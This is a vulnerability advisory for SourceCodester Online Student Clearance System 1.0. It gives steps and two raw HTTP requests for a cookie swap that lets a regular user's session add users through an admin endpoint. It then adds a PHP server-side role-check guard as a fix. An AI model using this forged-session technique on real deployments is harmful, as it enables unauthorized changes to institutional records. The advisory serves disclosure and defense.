### Critical Vulnerability Information

- **Vulnerability Type**: Incorrect Access Control
- **Affected Product**: SourceCodester Online Clearance System 1.0
- **Attack Type**: Remote

#### Description

SourceCodester Online Student Clearance System 1.0 contains a logical vulnerability that allows low-privileged users to forge high-privileged sessions and perform sensitive operations.

#### Exploitation Steps

1. **Admin Login and Add User Information**
   - Log in to the system using an admin account.
   - Add new user information and capture the request packet.
2. **User Login and Capture Packet**
   - Open an incognito browser and log in as a regular user.
   - Capture the user’s request packet.
3. **Replace User Cookie in Admin Request**
   - Replace the admin request’s cookie with the user’s cookie and send the request.
4. **Verify Data Exists in Database**
   - The database confirms that the data has been successfully added.

#### Example Code Snippets

```http
POST /admin/add_user.php HTTP/1.1
Host: www.stu.com:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.stu.com/SV/cw.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2ogucjrwvtoefoingqe3ool
Connection: close
```

```http
GET /index.php HTTP/1.1
Host: www.stu.com:81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.stu.com/SV/cw.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2ogucjrwvtoefoingqe3ool
Connection: close
```
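
#### Mitigation Example

A server-side role check of the kind that rejects the cookie swap in step 3, as an added example that is not the application's own code. The session keys `user_id` and `role`, the role names `admin` and `student`, and the helper names `authorize` and `require_role` are assumptions, since the page does not show the application's source.

```php
<?php
declare(strict_types=1);
// Added example, not the application's own code. Session keys 'user_id' and
// 'role' and both helper names are assumptions made for illustration.

/**
 * Decide the HTTP status for a request to a privileged endpoint, using only
 * server-side session state (never a client-supplied role or the URL path).
 */
function authorize(array $session, string $requiredRole): int
{
    if (empty($session['user_id'])) {
        return 401; // no authenticated session at all
    }
    // Strict comparison: a missing or differently typed role never matches.
    if (!isset($session['role']) || $session['role'] !== $requiredRole) {
        return 403; // authenticated, but not entitled to this action
    }
    return 200;
}

/** Guard to call first in every script under /admin/, before any DB write. */
function require_role(string $requiredRole): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $status = authorize($_SESSION, $requiredRole);
    if ($status !== 200) {
        http_response_code($status);
        // Log the denial so replayed low-privilege cookies show up in review.
        error_log(sprintf('authz denied: status=%d uri=%s user=%s', $status,
            $_SERVER['REQUEST_URI'] ?? '-', (string)($_SESSION['user_id'] ?? '-')));
        exit;
    }
}

// Constructed sessions replaying the page's scenario when run from the CLI.
if (PHP_SAPI === 'cli') {
    $cases = [
        'admin session'          => ['user_id' => 1, 'role' => 'admin'],
        'student cookie swapped' => ['user_id' => 42, 'role' => 'student'],
        'no session'             => [],
    ];
    foreach ($cases as $label => $session) {
        printf("%-24s -> %d\n", $label, authorize($session, 'admin'));
    }
}
```

With this guard, `require_role('admin');` would be the first statement in `/admin/add_user.php`, so the request carrying the regular user's `PHPSESSID` is answered with 403 before any row is inserted.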